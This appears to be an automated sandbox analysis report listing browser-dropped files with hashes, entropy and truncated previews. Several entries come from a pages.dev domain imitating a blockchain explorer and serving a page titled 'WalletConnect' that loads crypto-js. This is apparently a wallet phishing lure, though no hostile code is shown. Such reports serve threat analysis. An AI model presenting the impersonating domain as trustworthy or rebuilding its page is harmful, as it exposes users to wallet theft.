                                                                                                                                                                                                                                              Preview:import{r as S,i as y}from"./isObject-909534d5.js";import{t as b}from"./toNumber-e58af95e.js";var R=function(){return S.Date.now()};const h=R;var A="Expected a function",F=Math.max,N=Math.min;function j(x,i,a){var u,o,m,f,e,r,d=0,E=!1,c=!1,g=!0;if(typeof x!="function")throw new TypeError(A);i=b(i)||0,y(a)&&(E=!!a.leading,c="maxWait"in a,m=c?F(b(a.maxWait)||0,i):m,g="trailing"in a?!!a.trailing:g);function v(n){var t=u,l=o;return u=o=void 0,d=n,f=x.apply(l,t),f}function p(n){return d=n,e=setTimeout(s,i),E?v(n):f}function C(n){var t=n-r,l=n-d,W=i-t;return c?N(W,m-l):W}function k(n){var t=n-r,l=n-d;return r===void 0||t>=i||t<0||c&&l>=m}function s(){var n=h();if(k(n))return I(n);e=setTimeout(s,C(n))}function I(n){return e=void 0,g&&u?v(n):(u=o=void 0,f)}function L(){e!==void 0&&clearTimeout(e),d=0,u=r=o=e=void 0}function M(){return e===void 0?f:I(h())}function T(){var n=h(),t=k(n);if(u=arguments,o=this,r=n,t){if(e===void 0)return p(r);if(c)return clearTimeout(e),e=setTimeout(s,i),v(r)}return
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                              Entropy (8bit):5.082642204918865
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:pwJMyiqwJMHDzwZtAV2HKwZlvCmw13LoHw89oE4wHBL3MLEBJz6qE4v:LNwHKAU4r0H9fBLcLE9j
                                                                                                                                                                                                                                              MD5:7FF6101B945EA94B8E05BF165A11B952
                                                                                                                                                                                                                                              SHA1:30B9A3CB59BB261E92E78A695406BF64802A37A0
                                                                                                                                                                                                                                              SHA-256:7B621313FEC0CD0B9B902E566ADD2DEA6A84172BF72892635C6F4234AF039B7E
                                                                                                                                                                                                                                              SHA-512:F8E6C3C0D723F75DD63AC04853BF278E3412E88C5D30ABFD4D06F8827C209408D7B8745312770F5C126CA27ED4DE8AAA577B72D668524F12DE3DBD9FBEBB723E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const s="/assets/twitter-CjM0oJxu.png",t="/assets/twitter_w-Lq2eUASd.png",n="/assets/tg_channel-BaEz77Ff.png",a="/assets/tg-CdRZIRE6.png",e="/assets/ins-B6hRyGxO.png",c="/assets/ins_w-Cu8q5kE8.png",g="/assets/discord-DzNUvjVK.png";export{t as a,n as b,a as c,c as d,g as e,e as i,s as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1144)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2595
                                                                                                                                                                                                                                              Entropy (8bit):4.9969695038964055
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:9CC4Us/lBL8lnQ2ZR4zKNIeN9huEY4raxzyKvZ1xhKWz+WBOeS/PxMnyKTY:Aos/n4lQ2ZR4+v96YaAobBEeS/Pdv
                                                                                                                                                                                                                                              MD5:10BDDEF181990AC892F74A9350700BCD
                                                                                                                                                                                                                                              SHA1:4007013D46A62F005C31F558DD92DEDAD8ED2279
                                                                                                                                                                                                                                              SHA-256:3C9F15679CEB7720448D31B4C5C58EB955D26AD4A69D3D97F901158F9E941291
                                                                                                                                                                                                                                              SHA-512:C332B1A9F333EC17A0ADDF956328CC6E106C79363CA1753B28EA26A1355859F85CBFB581DF8FB993304A804672103D5BBA91A6F1E905404E1F7C044082159B20
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/components/hs.go-to.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSGoTo={_baseConfig:{},pageCollection:$(),init:function(selector,config){this.collection=selector&&$(selector).length?$(selector):$();if(!$(selector).length)return;this.config=config&&$.isPlainObject(config)?$.extend({},this._baseConfig,config):this._baseConfig;this.config.itemSelector=selector;this.initGoTo();return this.pageCollection;},initGoTo:function(){var $self=this,collection=$self.pageCollection;this.collection.each(function(i,el){var $this=$(el),$target=$this.data('target'),isReferencedToPage=Boolean($this.data('is-referenced-to-page')),type=$this.data('type'),showEffect=$this.data('show-effect'),hideEffect=$this.data('hide-effect'),position=JSON.parse(el.getAttribute('data-position')),compensation=$($this.data('compensation')).outerHeight(),offsetTop=$this.data('offset-top'),targetOffsetTop=function(){if(compensation){return $target?$($target).offset().top-compensation:0;}else{return $target?$($target).offset().top:0;}};if(type=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64165)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):64212
                                                                                                                                                                                                                                              Entropy (8bit):5.2478191019756
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:VPlcKVuaBJSXH4yWYUmFq54mjczZNVu6aLm/AX4ux7XV:zcKVuaBJSXH4tYUl1y/wL
                                                                                                                                                                                                                                              MD5:292192EB489CFC4D9AFED840924CAB54
                                                                                                                                                                                                                                              SHA1:81CA996CCC051023356EF2BC4B340A66C9E0780D
                                                                                                                                                                                                                                              SHA-256:ACD10D537FB4003C5C3AFE583EFEB69D04169CD2167CAD2C931B80AB8B108DCF
                                                                                                                                                                                                                                              SHA-512:918E8313F958C947DD2ED7740EFF1367A0C9675005D0799AE87BEA5C2009CD35091CEDBD3DAB09C9B83162EBB0C029BD79D2527C38DF88D8A2EDAA4322296691
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{a7 as r}from"./manifest-51a3674f.js";const t=`.container{width:100%}@media (min-width: 640px){.container{max-width:640px}}@media (min-width: 768px){.container{max-width:768px}}@media (min-width: 1024px){.container{max-width:1024px}}@media (min-width: 1280px){.container{max-width:1280px}}@media (min-width: 1536px){.container{max-width:1536px}}.bonus-card{display:grid;grid:"cover title title" auto "cover content content" 1fr "cover description actions" 2.5rem / auto 1fr 1fr}@media (min-width: 640px){.bonus-card{grid:"cover" auto "title" auto "content" 1fr}}.bonus-card-small{grid:"cover title actions" auto "cover content actions" 1fr "cover description actions" auto /auto 1fr auto}.vip-join-button{--bonus-gradients-vip-join-button: linear-gradient(270deg, #FBD765 0%, #EF9E3F 100%);background-image:var(--bonus-gradients-vip-join-button);box-shadow:0 -2px #d3872c inset}.popup-rules{list-style-type:none}.popup-rules li{position:relative;padding-left:1rem}.popup-rules li:before{content
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 32 x 33, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1078
                                                                                                                                                                                                                                              Entropy (8bit):7.33602222614592
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:2aHE3dIWfY1ZHzWqvyOrczlzRWpTquJ3CaN:2TuQYLxLK1WpTq+3RN
                                                                                                                                                                                                                                              MD5:C7E2CEFB07273C9E62CF31DD5D511981
                                                                                                                                                                                                                                              SHA1:4B916DB33A0A4E2D80ECF696134D1A8F508C0B21
                                                                                                                                                                                                                                              SHA-256:0C108CF21FCE23B49EDEA65FDF6800FFDAC0C76E695DE275BEFD0B66D2FF0E8C
                                                                                                                                                                                                                                              SHA-512:94BEF2E32831552F6701F4C828F86A741CC4E42ABBE593ADC9C73430E709C71C000E9094C285E5263EC44C191E4C821367C6213F0467B6280CEBAE578A67407D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/dot-C8z5Aoh_.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR... ...!.......Yc....sRGB.........gAMA......a.....PLTE........................U..U.U...U.U......f..f.ff....f.f...m..m.mU....m.m.mU.I.m...q..`..`..U.qq.`.U.qt..f..f..]..t.f.].].tM.j..b..j.b.b.vU.m..[..U..f.[..U.Z..`.`.Z..P.c..c..c.c.^.U.Q.U.U.Y..f.a.Y.U.Y.U.Y.Y..].Y.Q.Q.].Y.Q.U.R..U.R.U.X..U..N..X.U.R..O..X.R.R..O.R.U.R.U..P.M..P.M..R..P.R..P..K..I..N.N.L.N.L.L.J.H.J.H.D.F.F.D.3p61....tRNS..........................................................................................................! ! !"#"#"#$$%$%%&'&')(()w.......IDATx...n.0.E9h.l..M...3x.,Qd...H...]I..g!R..af"....G3.jg....f.@.^...@N...{.....0...8...:...z.=.n.<,T..P...0.....-..`Q....e0..O..B........40x...8<..,.Lk.............t......8z.'`..p..R.~.O.&..O.u...F.!.if&.q./.A..q.SH.c..}....0......9U?b.A@..=...L...W.+8....z[..V......'..%d.V.W.....H...CY..-j..m.W96.J..n.CZ....{+..]."0{..A..Z.......$..g...R^.K...`.YE.7...........p'.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 590 x 113, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):15804
                                                                                                                                                                                                                                              Entropy (8bit):7.962683488479848
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:3HOkqeSX8hzEgT821KQPq992y0iDLXDtRL3zfRExR6F7QHN35:3+X8G+/1bc9ZvBEj6JQHL
                                                                                                                                                                                                                                              MD5:7B950C80F11206A99508357BB2E40D3F
                                                                                                                                                                                                                                              SHA1:15B4DE4D9FB62DDD57A4311FA69B9F2566A15EAF
                                                                                                                                                                                                                                              SHA-256:9E3BE815ED4AB1600905015290DCE88EAA5866C4610AB7BE681800BD2B0755A5
                                                                                                                                                                                                                                              SHA-512:390F56468C59F2153EAC3895404091C1CC835E734B7D6F2781EC858C8F2164BC21EA79FD0B281190B0D03CFF1B98318D2A80D776086E5FB035077332E9F4EBAB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...N...q.....#.,.....sRGB.........gAMA......a...=fIDATx...O..T.....mQDE..C..T.....\A.E.E........"U.z....M^..N...l..x[....Q..jAZp...t.t....N..~.w..L...S...................................YY...Q@.....U.q...V.v.......gZ.@j.;.p._....m.P.......6.h4.<..G..C..3g.T....x5..e^v0......6..Cm...8w...2..m.o..Mm...._.PbdC.p...pR..(.i....h+'.<<...C..........}Z)..sf.N..m..6.......A..N..)..r..Vb...YxH..6......G...r....8.v.....).U...|.N..yd..VC1W...x.i#v._..X}.t8....b.O..x.d..WmP.Su.......(.>.:l.N..r!..3m....w).rS.i..j.ym...a....T8U.v.q..~.`*....+N..<.f......m.:.yJu.$....S....z.*.r....mme.Z9.......\.N.D.,..V.p*c#;..A...h..1.p.|..V.t....}.c.p....].R..,oS....(.L}q,..96...j......zkk.+tNM8....D....f.N.1n.F>].......N..K..k....:.p..#........`.4..2qr16....{...d...~.CxTMiA8U....C..'.......pT.3..j.V..}VB.&..z+..mn.a.c..S5.l..j....#.&"....S.I}q\......m8.....:n...hhaa.T.Z..*.'...Z....@C....@C....@C....@C....@C....@C....@C....@C....@C....@C....@C.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1336
                                                                                                                                                                                                                                              Entropy (8bit):7.845168666352689
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:sXA06UnyTwDGak7mMo4ti0YFYK2wMAx7IqPML3lGR1F7yrURCsZvq+ql:R/UyyGa03ti01AxP0wRcys
                                                                                                                                                                                                                                              MD5:ED439A2EE1803B077EA1116D84CBE6AD
                                                                                                                                                                                                                                              SHA1:0FE22FAA952529AF4A8D1E322E4509F65806E3F1
                                                                                                                                                                                                                                              SHA-256:90C49ACFADF8C57EA1CE9E0AA3AFBEC7EEBB58E6945D03D89FA6E59E39CC3A87
                                                                                                                                                                                                                                              SHA-512:A7FBD597891E4148012D5D888CF51C27AF05913C265B9790C00A9557E387B4D321FB083966E355C03CF4C9739E48CB9B50150C6922B9C4ECA4E3C9D131020EBA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/BTC.black.png
                                                                                                                                                                                                                                              Preview:RIFF0...WEBPVP8L#.../c......m.?.9..g.m$..=v.;.m$).t..y.e8.....#..du...............\6N.Ntd............[.YXp....6.80.!c...>............x.....?d...&QB.w.&dB..T.....1awf..#........=.a..^...~y<nV..~5.V.....nJ....P..O_...vo.I..7S5..%0h.pQ..~.L..?.}.;`.V......?..4....LV..H.OF.3P...d.g.J.....V.X.o....\.w2.s..M_..L.L...h/.s.m..z8W..Q...;..M...0.......|.C<W.......y.5."..t._.r=.......C..CMw............^gL/5ES.t...5...r.f_.N...#..O.Zr.......)..h...+..P.$.m.x..H...!.;/b(.z^..!th:......./Y._;D}......D..=%..F.R.b.z@..5{zT)SN...1..~..,.F2.........0...l.A......D_J5.B.d.W.M.7....(.@....Z...zs.g.*.s...Dd..z..s9#.....Q.[.........8NG.C.1O.$..X.'M..;b...U..Y.,.y.m.N.4..),..X...?./'...t!wh..j.(..%.9n.....GH..f.....(...%...ge.82yc.B.TH.d....5.qxT.$.<..9P...f(..A..$q.+k...X....:I..i.....ZJ.d...5....bJ..U.Q.H..f.6t.. i...Kas...:.u$w.S8>..Q...$....^x...b..^mV.S.1]....A..w.{E........s..n"....*!<[|.>.c*\j..#U...b..@SR...].G...c...<.&i...|C.T.R....&yC......~E..#...\..l.R.G...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4699)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4718
                                                                                                                                                                                                                                              Entropy (8bit):5.52798690967123
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:TURuV+G93iry/o1bzjdKiowziOgjMJgwPOi5eriEW9cJMi7x:ARAVoNdKryi8JgQArijji7x
                                                                                                                                                                                                                                              MD5:F60C73ADA591C2B97F071D996797F7A7
                                                                                                                                                                                                                                              SHA1:9622D54808392C5F70891E403F35D6A7F79B3005
                                                                                                                                                                                                                                              SHA-256:23D1A28488ED4E92499CA48C1D33888716DCBCB2175D2F65AB8425A63AF2A6C4
                                                                                                                                                                                                                                              SHA-512:99C2BFCC6029C01E64AE1CD57D60B0A43B0CC7244F399775ADCEF193EF6B33706B6ADEB822DA7572A375BCCB5D828FCA97A864F9C71D9DDAE11D767DE4158D60
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
